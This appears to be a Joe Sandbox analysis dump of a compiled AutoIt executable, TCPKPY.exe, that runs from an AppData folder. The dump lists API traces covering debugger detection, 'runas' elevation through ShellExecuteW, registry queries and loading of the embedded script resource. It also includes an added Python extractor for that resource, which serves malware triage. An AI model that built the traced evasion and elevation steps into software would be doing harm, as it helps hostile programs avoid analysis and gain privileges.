_memset 104134->104159 104141 2722e3 MoveWindow 104135->104141 104142 2722af 104135->104142 104145 202a1f 104136->104145 104137->104120 104165 23b31f 48 API calls 104137->104165 104138->104145 104146 27235f 104138->104146 104139 2723a1 104139->104120 104139->104126 104141->104126 104148 2722b3 104142->104148 104149 2722d2 SetFocus 104142->104149 104144 202a6d 104160 202ac7 DeleteObject DestroyWindow Mailbox 104144->104160 104145->104120 104162 202b94 Shell_NotifyIconW _memset 104145->104162 104164 245fdb 70 API calls _memset 104146->104164 104147 202ac5 104147->104126 104148->104145 104152 2722bc 104148->104152 104149->104126 104154 20322e 16 API calls 104152->104154 104154->104126 104156 272353 104163 203598 67 API calls _memset 104156->104163 104158->104120 104159->104144 104160->104126 104161->104147 104162->104156 104163->104158 104164->104147 104165->104158 104166->104139 104167 271f5f 104170 2045a7 104167->104170 104171 275935 DestroyWindow 104170->104171 104172 2045e6 mciSendStringW 104170->104172 104175 275941 104171->104175 104173 204604 104172->104173 104174 2047a6 104172->104174 104173->104175 104176 204610 104173->104176 104174->104173 104177 2047b5 UnregisterHotKey 104174->104177 104178 275946 104175->104178 104179 27595a FindClose 104175->104179 104181 275976 104176->104181 104182 20462b 104176->104182 104177->104174 104200 2050ec CloseHandle 104178->104200 104179->104181 104184 2759ac 104181->104184 104185 27599b FreeLibrary 104181->104185 104182->104184 104189 204639 104182->104189 104183 275950 104183->104181 104186 2759c0 VirtualFree 104184->104186 104190 2046a6 104184->104190 104185->104181 104186->104184 104187 204695 CoUninitialize 104187->104190 104189->104187 104198 2032c9 CloseHandle 104190->104198 104191 2046ae Mailbox 104199 204208 47 API calls Mailbox 104191->104199 104193 2046c9 Mailbox 104194 202de4 47 API calls 104193->104194 104195 2046df Mailbox 104194->104195 104196 203282 CloseHandle InternetCloseHandle InternetCloseHandle 
WaitForSingleObject 104195->104196 104197 2047a1 104196->104197 104198->104191 104200->104183 104201 271eed 104206 21e975 104201->104206 104203 271f01 104222 221b2a 52 API calls __cinit 104203->104222 104205 271f0b 104207 22010a 48 API calls 104206->104207 104208 21ea27 GetModuleFileNameW 104207->104208 104223 22297d 104208->104223 104210 21ea5b _wcsncat 104226 222bff 104210->104226 104213 22010a 48 API calls 104214 21ea94 _wcscpy 104213->104214 104215 20d3d2 48 API calls 104214->104215 104216 21eacf 104215->104216 104229 21eb05 104216->104229 104218 21eae0 Mailbox 104218->104203 104219 20a4f6 48 API calls 104221 21eada _wcscat __NMSG_WRITE _wcsncpy 104219->104221 104220 22010a 48 API calls 104220->104221 104221->104218 104221->104219 104221->104220 104222->104205 104243 2229c7 104223->104243 104269 22aab9 104226->104269 104281 20c4cd 104229->104281 104231 21eb14 RegOpenKeyExW 104232 274b17 RegQueryValueExW 104231->104232 104233 21eb35 104231->104233 104234 274b91 RegCloseKey 104232->104234 104235 274b30 104232->104235 104233->104221 104236 22010a 48 API calls 104235->104236 104237 274b49 104236->104237 104238 204bce 48 API calls 104237->104238 104239 274b53 RegQueryValueExW 104238->104239 104240 274b6f 104239->104240 104241 274b86 104239->104241 104242 207e53 48 API calls 104240->104242 104241->104234 104242->104241 104244 2229e2 104243->104244 104247 2229d6 104243->104247 104267 22889e 47 API calls __getptd_noexit 104244->104267 104246 222b9a 104256 2229c2 104246->104256 104268 227aa0 8 API calls ___wstrgtold12_l 104246->104268 104247->104244 104255 222a55 104247->104255 104262 22a9fb 47 API calls ___wstrgtold12_l 104247->104262 104250 222b21 104250->104244 104252 222b31 104250->104252 104250->104256 104251 222ae0 104251->104244 104253 222afc 104251->104253 104264 22a9fb 47 API calls ___wstrgtold12_l 104251->104264 104266 22a9fb 47 API calls ___wstrgtold12_l 104252->104266 104253->104244 104253->104256 104258 222b12 104253->104258 104255->104244 104261 222ac2 
104255->104261 104263 22a9fb 47 API calls ___wstrgtold12_l 104255->104263 104256->104210 104265 22a9fb 47 API calls ___wstrgtold12_l 104258->104265 104261->104250 104261->104251 104262->104255 104263->104261 104264->104253 104265->104256 104266->104256 104267->104246 104268->104256 104270 22abc6 104269->104270 104271 22aaca 104269->104271 104279 22889e 47 API calls __getptd_noexit 104270->104279 104271->104270 104277 22aad5 104271->104277 104273 22abbb 104280 227aa0 8 API calls ___wstrgtold12_l 104273->104280 104276 21ea8a 104276->104213 104277->104276 104278 22889e 47 API calls __getptd_noexit 104277->104278 104278->104273 104279->104273 104280->104276 104282 20c4e7 104281->104282 104284 20c4da 104281->104284 104283 22010a 48 API calls 104282->104283 104283->104284 104284->104231 104285 271e8b 104290 21e44f 104285->104290 104289 271e9a 104291 22010a 48 API calls 104290->104291 104292 21e457 104291->104292 104293 21e46b 104292->104293 104298 21e74b 104292->104298 104297 221b2a 52 API calls __cinit 104293->104297 104297->104289 104299 21e754 104298->104299 104300 21e463 104298->104300 104330 221b2a 52 API calls __cinit 104299->104330 104302 21e47b 104300->104302 104303 20d3d2 48 API calls 104302->104303 104304 21e492 GetVersionExW 104303->104304 104305 207e53 48 API calls 104304->104305 104306 21e4d5 104305->104306 104331 21e5f8 104306->104331 104312 2729f9 104313 21e576 104316 21e5ec GetSystemInfo 104313->104316 104317 21e59e 104313->104317 104314 21e55f GetCurrentProcess 104348 21e70e LoadLibraryA GetProcAddress 104314->104348 104319 21e5c9 104316->104319 104342 21e694 104317->104342 104321 21e5d7 FreeLibrary 104319->104321 104322 21e5dc 104319->104322 104321->104322 104322->104293 104324 21e5e4 GetSystemInfo 104326 21e5be 104324->104326 104325 21e5b4 104345 21e437 104325->104345 104326->104319 104329 21e5c4 FreeLibrary 104326->104329 104329->104319 104330->104300 104332 21e601 104331->104332 104333 20a2fb 48 API calls 104332->104333 104334 21e4dd 104333->104334 
104335 21e617 104334->104335 104336 21e625 104335->104336 104337 20a2fb 48 API calls 104336->104337 104338 21e4e9 104337->104338 104338->104312 104339 21e6d1 104338->104339 104349 21e6e3 104339->104349 104353 21e6a6 104342->104353 104346 21e694 2 API calls 104345->104346 104347 21e43f GetNativeSystemInfo 104346->104347 104347->104326 104348->104313 104350 21e55b 104349->104350 104351 21e6ec LoadLibraryA 104349->104351 104350->104313 104350->104314 104351->104350 104352 21e6fd GetProcAddress 104351->104352 104352->104350 104354 21e5ac 104353->104354 104355 21e6af LoadLibraryA 104353->104355 104354->104324 104354->104325 104355->104354 104356 21e6c0 GetProcAddress 104355->104356 104356->104354 104357 271edb 104362 20131c 104357->104362 104359 271ee1 104395 221b2a 52 API calls __cinit 104359->104395 104361 271eeb 104363 20133e 104362->104363 104396 201624 104363->104396 104368 20d3d2 48 API calls 104369 20137e 104368->104369 104370 20d3d2 48 API calls 104369->104370 104371 201388 104370->104371 104372 20d3d2 48 API calls 104371->104372 104373 201392 104372->104373 104374 20d3d2 48 API calls 104373->104374 104375 2013d8 104374->104375 104376 20d3d2 48 API calls 104375->104376 104377 2014bb 104376->104377 104404 201673 104377->104404 104381 2014eb 104382 20d3d2 48 API calls 104381->104382 104383 2014f5 104382->104383 104433 20175e 104383->104433 104385 201540 104386 201550 GetStdHandle 104385->104386 104387 2015ab 104386->104387 104388 2758da 104386->104388 104390 2015b1 CoInitialize 104387->104390 104388->104387 104389 2758e3 104388->104389 104440 249bd1 53 API calls 104389->104440 104390->104359 104392 2758ea 104441 24a2f6 CreateThread 104392->104441 104394 2758f6 CloseHandle 104394->104390 104395->104361 104442 2017e0 104396->104442 104399 207e53 48 API calls 104400 201344 104399->104400 104401 2016db 104400->104401 104456 201867 6 API calls 104401->104456 104403 201374 104403->104368 104405 20d3d2 48 API calls 104404->104405 104406 201683 104405->104406 104407 
20d3d2 48 API calls 104406->104407 104408 20168b 104407->104408 104457 207d70 104408->104457 104411 207d70 48 API calls 104412 20169b 104411->104412 104413 20d3d2 48 API calls 104412->104413 104414 2016a6 104413->104414 104415 22010a 48 API calls 104414->104415 104416 2014c5 104415->104416 104417 2016f2 104416->104417 104418 201700 104417->104418 104419 20d3d2 48 API calls 104418->104419 104420 20170b 104419->104420 104421 20d3d2 48 API calls 104420->104421 104422 201716 104421->104422 104423 20d3d2 48 API calls 104422->104423 104424 201721 104423->104424 104425 20d3d2 48 API calls 104424->104425 104426 20172c 104425->104426 104427 207d70 48 API calls 104426->104427 104428 201737 104427->104428 104429 22010a 48 API calls 104428->104429 104430 20173e 104429->104430 104431 2724a6 104430->104431 104432 201747 RegisterWindowMessageW 104430->104432 104432->104381 104434 2767dd 104433->104434 104435 20176e 104433->104435 104462 24d231 50 API calls 104434->104462 104436 22010a 48 API calls 104435->104436 104438 201776 104436->104438 104438->104385 104439 2767e8 104440->104392 104441->104394 104463 24a2dc 54 API calls 104441->104463 104449 2017fc 104442->104449 104445 2017fc 48 API calls 104446 2017f0 104445->104446 104447 20d3d2 48 API calls 104446->104447 104448 20165b 104447->104448 104448->104399 104450 20d3d2 48 API calls 104449->104450 104451 201807 104450->104451 104452 20d3d2 48 API calls 104451->104452 104453 20180f 104452->104453 104454 20d3d2 48 API calls 104453->104454 104455 2017e8 104454->104455 104455->104445 104456->104403 104458 20d3d2 48 API calls 104457->104458 104459 207d79 104458->104459 104460 20d3d2 48 API calls 104459->104460 104461 201693 104460->104461 104461->104411 104462->104439 104464 271eca 104469 21be17 104464->104469 104468 271ed9 104470 20d3d2 48 API calls 104469->104470 104471 21be85 104470->104471 104477 21c929 104471->104477 104473 21bf22 104474 21bf3e 104473->104474 104480 21c8b7 48 API calls _memmove 104473->104480 104476 221b2a 52 
API calls __cinit 104474->104476 104476->104468 104481 21c955 104477->104481 104480->104473 104482 21c962 104481->104482 104483 21c948 104481->104483 104482->104483 104484 21c969 RegOpenKeyExW 104482->104484 104483->104473 104484->104483 104485 21c983 RegQueryValueExW 104484->104485 104486 21c9a4 104485->104486 104487 21c9b9 RegCloseKey 104485->104487 104486->104487 104487->104483

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0020376D
  • Part of subcall function 00204257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,00000000,00000001,00000000), ref: 0020428C
• IsDebuggerPresent.KERNEL32(?,?), ref: 0020377F
• GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,002C1120,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,002C1124,?,?), ref: 002037EE
  • Part of subcall function 002034F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0020352A
• SetCurrentDirectoryW.KERNEL32(?), ref: 00203860
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,002B2934,00000010), ref: 002721C5
• SetCurrentDirectoryW.KERNEL32(?,?), ref: 002721FD
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00272232
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0029DAA4), ref: 00272290
• ShellExecuteW.SHELL32(00000000), ref: 00272297
  • Part of subcall function 002030A5: GetSysColorBrush.USER32(0000000F), ref: 002030B0
  • Part of subcall function 002030A5: LoadCursorW.USER32(00000000,00007F00), ref: 002030BF
  • Part of subcall function 002030A5: LoadIconW.USER32(00000063), ref: 002030D5
  • Part of subcall function 002030A5: LoadIconW.USER32(000000A4), ref: 002030E7
  • Part of subcall function 002030A5: LoadIconW.USER32(000000A2), ref: 002030F9
  • Part of subcall function 002030A5: RegisterClassExW.USER32(?), ref: 00203167
  • Part of subcall function 00202E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00202ECB
                                                                                                                  • Part of subcall function 00202E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00202EEC
                                                                                                                  • Part of subcall function 00202E9D: ShowWindow.USER32(00000000), ref: 00202F00
                                                                                                                  • Part of subcall function 00202E9D: ShowWindow.USER32(00000000), ref: 00202F09
                                                                                                                  • Part of subcall function 00203598: _memset.LIBCMT ref: 002035BE
                                                                                                                  • Part of subcall function 00203598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00203667
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$",
                                                                                                                • API String ID: 4253510256-2040468189
                                                                                                                • Opcode ID: 2ecfe6c2f6d2cf0b0fdddf3c6e8bca304052045285fed3cd1fb8eaaf3b478da3
                                                                                                                • Instruction ID: d2d834d62845a9e1f980d56d7aadd88ad3bcd540d2807a1484dab75467d5f6f4
                                                                                                                • Opcode Fuzzy Hash: 2ecfe6c2f6d2cf0b0fdddf3c6e8bca304052045285fed3cd1fb8eaaf3b478da3
                                                                                                                • Instruction Fuzzy Hash: 6A512A74664345FADF10EBA0AC4BFAD3B6C9B06700F04419AFA49921D3D6B04A79CF62

                                                                                                                Control-flow Graph (rendered graph with executed/not-executed colouring not preserved; text dump summarised): function 0021E47B calls GetVersionExW, then GetCurrentProcess, GetNativeSystemInfo and GetSystemInfo, with FreeLibrary on the exit paths at 0021E5C4 and 0021E5D7; the main path ends at 0021E5F6 and the out-of-line blocks at 0027297F to 00272A29 all rejoin at 0021E54D.
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0021E4A7
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,0029DC28,?,?), ref: 0021E567
                                                                                                                • GetNativeSystemInfo.KERNEL32(?,0029DC28,?,?), ref: 0021E5BC
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0021E5C7
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0021E5DA
                                                                                                                • GetSystemInfo.KERNEL32(?,0029DC28,?,?), ref: 0021E5E4
                                                                                                                • GetSystemInfo.KERNEL32(?,0029DC28,?,?), ref: 0021E5F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2717633055-0
                                                                                                                • Opcode ID: e840183899be8e56eaf3e752e24675144fd7025ac22b325f7966b897c46407b1
                                                                                                                • Instruction ID: befcb52a74a630becc4366bbff645d3ec2a25ad742e3463b584469c2074ba8de
                                                                                                                • Opcode Fuzzy Hash: e840183899be8e56eaf3e752e24675144fd7025ac22b325f7966b897c46407b1
                                                                                                                • Instruction Fuzzy Hash: 3F61D1B182A284DBCF15CF6898C01E97FA56F3A304F6A85D8DC489B247E634C958CB65

                                                                                                                Control-flow Graph (rendered graph with executed/not-executed colouring not preserved; text dump summarised): function 002031F2 calls CreateStreamOnHGlobal, then FindResourceExW; on success the out-of-line blocks at 002757D3 to 0027582B call LoadResource, SizeofResource and LockResource in turn, and every failure path returns to 00203229.
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00203202
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00203219
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 002757D7
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 002757EC
                                                                                                                • LockResource.KERNEL32(?), ref: 002757FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                • Opcode ID: dea5c1d66852d0dabe4b44e4105960930656fe6db9d3a72604eb8207fba0a91c
                                                                                                                • Instruction ID: 59deee8cc9f34f3eb92229ea1c47618e894a2876ba11bd9c9407039c1f09b1d5
                                                                                                                • Opcode Fuzzy Hash: dea5c1d66852d0dabe4b44e4105960930656fe6db9d3a72604eb8207fba0a91c
                                                                                                                • Instruction Fuzzy Hash: 67115A74210701BFE7219B65EC48F27BBBDEBC9B51F108028B80286191DB71DD158A60
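The API sequence above (CreateStreamOnHGlobal, FindResourceExW with type 0x0A and name SCRIPT, LoadResource, SizeofResource, LockResource) is the AutoIt v3 stub locating its compiled script, which is stored as an RT_RCDATA resource named SCRIPT, and wrapping it in an IStream. For triage of the dropped TCPKPY.exe the useful step is to pull that resource out of the file offline and hand it to an AutoIt decompiler. The following is an added example, not code from the report, from Joe Sandbox or from AutoIt: it walks the PE resource directory by type, name and language the way FindResourceExW does, with bounds checks so a crafted directory cannot read outside the resource section, and runs against a constructed minimal PE32 whose SCRIPT payload is a placeholder string rather than a real compiled script (the builder, its offsets and the payload are all assumptions made for the demo).

```python
"""Extract a PE resource by (type, name[, language]), mirroring the FindResourceExW lookup."""
import struct

RT_RCDATA = 10  # resource type 0x0A, as in FindResourceExW(?, 0000000A, SCRIPT, 00000000)


def _headers(pe: bytes):
    """Return (resource_dir_rva, resource_dir_size, [(va, vsize, raw_ptr, raw_size), ...])."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd = opt + (96 if magic == 0x10B else 112)            # data directories start (PE32 vs PE32+)
    rsrc_rva, rsrc_size = struct.unpack_from("<II", pe, dd + 2 * 8)  # directory index 2 = resources
    secs = []
    sec_tab = opt + opt_size
    for i in range(nsec):
        _, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, sec_tab + 40 * i)
        secs.append((va, vsize, raw_ptr, raw_size))
    return rsrc_rva, rsrc_size, secs


def _rva_to_off(secs, rva: int) -> int:
    """Map an RVA to a file offset through the section table."""
    for va, vsize, raw_ptr, raw_size in secs:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _entries(pe: bytes, rsrc_off: int, rsrc_size: int, dir_off: int):
    """Yield (key, target_offset, is_subdir) for one IMAGE_RESOURCE_DIRECTORY; key is int or str."""
    if dir_off + 16 > rsrc_size:
        raise ValueError("resource directory outside the resource section")
    named, ids = struct.unpack_from("<HH", pe, rsrc_off + dir_off + 12)
    for i in range(named + ids):
        name, data = struct.unpack_from("<II", pe, rsrc_off + dir_off + 16 + 8 * i)
        if name & 0x80000000:                               # IMAGE_RESOURCE_DIR_STRING_U (len, UTF-16LE)
            s = rsrc_off + (name & 0x7FFFFFFF)
            n = struct.unpack_from("<H", pe, s)[0]
            key = pe[s + 2:s + 2 + 2 * n].decode("utf-16-le")
        else:
            key = name
        yield key, data & 0x7FFFFFFF, bool(data & 0x80000000)


def _match(key, wanted) -> bool:
    if isinstance(key, str) and isinstance(wanted, str):
        return key.upper() == wanted.upper()                # resource names compare case-insensitively
    return key == wanted


def find_resource(pe: bytes, rtype, name, lang=None):
    """Walk type -> name -> language and return the resource bytes, or None if it is absent."""
    rsrc_rva, rsrc_size, secs = _headers(pe)
    if rsrc_rva == 0:
        return None
    rsrc_off = _rva_to_off(secs, rsrc_rva)
    for t_key, t_off, t_dir in _entries(pe, rsrc_off, rsrc_size, 0):
        if not (t_dir and _match(t_key, rtype)):
            continue
        for n_key, n_off, n_dir in _entries(pe, rsrc_off, rsrc_size, t_off):
            if not (n_dir and _match(n_key, name)):
                continue
            for l_key, l_off, l_dir in _entries(pe, rsrc_off, rsrc_size, n_off):
                if l_dir or (lang is not None and l_key != lang):
                    continue
                if l_off + 16 > rsrc_size:
                    raise ValueError("resource data entry outside the resource section")
                data_rva, size = struct.unpack_from("<II", pe, rsrc_off + l_off)  # IMAGE_RESOURCE_DATA_ENTRY
                off = _rva_to_off(secs, data_rva)
                if off + size > len(pe):
                    raise ValueError("resource data runs past end of file")
                return pe[off:off + size]
    return None


def build_sample_pe(payload: bytes) -> bytes:
    """Constructed PE32 with one .rsrc section holding RT_RCDATA / "SCRIPT" / language 0 = payload.
    Tree layout (offsets from section start, chosen for this demo): root dir 0x00, type dir 0x18,
    language dir 0x30, name string 0x48, data entry 0x58, payload 0x68."""
    RSRC_RVA, RSRC_RAW = 0x1000, 0x200
    root = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", RT_RCDATA, 0x80000000 | 0x18)
    tdir = struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0) + struct.pack("<II", 0x80000000 | 0x48, 0x80000000 | 0x30)
    ldir = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", 0, 0x58)
    name = (struct.pack("<H", 6) + "SCRIPT".encode("utf-16-le")).ljust(16, b"\0")
    dent = struct.pack("<IIII", RSRC_RVA + 0x68, len(payload), 0, 0)
    rsrc = root + tdir + ldir + name + dent + payload
    raw_size = (len(rsrc) + 0x1FF) & ~0x1FF
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 14, 0, 0, len(rsrc), 0, 0x1000, 0x1000, 0x1000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0,
                       0x2000, 0x200, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[2] = (RSRC_RVA, len(rsrc))                                              # resource directory
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), RSRC_RVA, raw_size, RSRC_RAW, 0, 0, 0, 0, 0x40000040)
    hdr = (dos + coff + opt + sec).ljust(RSRC_RAW, b"\0")
    return hdr + rsrc.ljust(raw_size, b"\0")


# Constructed input: the payload is a placeholder, not a real compiled AutoIt script.
SAMPLE_PE = build_sample_pe(b"constructed placeholder, not a real compiled AutoIt script")

if __name__ == "__main__":
    blob = find_resource(SAMPLE_PE, RT_RCDATA, "SCRIPT")
    print(len(blob), blob[:24])
```

On a real dropped binary, `find_resource(open(path, "rb").read(), RT_RCDATA, "SCRIPT")` returns the bytes the stub passes to CreateStreamOnHGlobal; write them to disk and feed them to an AutoIt decompiler. The explicit checks that directory and data-entry offsets stay inside the resource section matter because the sample is untrusted input and a malformed tree is a cheap way to crash naive extractors.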
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 07d2a0ab6b1590da5ad7f21ccabdc005ccd4f2cff060c79a76122a901c8cac75
                                                                                                                • Instruction ID: 846a1fab29e1b875f56c78dd3929f142fb7a8da108a967bace7bb56136cced6b
                                                                                                                • Opcode Fuzzy Hash: 07d2a0ab6b1590da5ad7f21ccabdc005ccd4f2cff060c79a76122a901c8cac75
                                                                                                                • Instruction Fuzzy Hash: 5E22B071921206DFDB24DF98C484AAAF7F1FF18300F14C469E85A9B392D770ADA5CB91
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020E279
                                                                                                                • timeGetTime.WINMM ref: 0020E51A
                                                                                                                • TranslateMessage.USER32(?), ref: 0020E646
                                                                                                                • DispatchMessageW.USER32(?), ref: 0020E651
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020E664
                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 0020E697
                                                                                                                • DestroyWindow.USER32 ref: 0020E6A3
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020E6BD
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00275B15
                                                                                                                • TranslateMessage.USER32(?), ref: 002762AF
                                                                                                                • DispatchMessageW.USER32(?), ref: 002762BD
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002762D1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                • API String ID: 2641332412-570651680
                                                                                                                • Opcode ID: 99874d3327183c5ad064173bf0ccd773253d7a1890c81f876996a8be7ef0c7ed
                                                                                                                • Instruction ID: 80a62d0b953b1b877cde8e8ddef323e15a30386b624962862e17f6faecb4eff0
                                                                                                                • Opcode Fuzzy Hash: 99874d3327183c5ad064173bf0ccd773253d7a1890c81f876996a8be7ef0c7ed
                                                                                                                • Instruction Fuzzy Hash: 5B62D1705283419FEB24DF24D899BAA77E4BF45304F04496DF9498B2D3DBB0D8A8CB52
                                                                                                                APIs
                                                                                                                • ___createFile.LIBCMT ref: 00236C73
                                                                                                                • ___createFile.LIBCMT ref: 00236CB4
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00236CDD
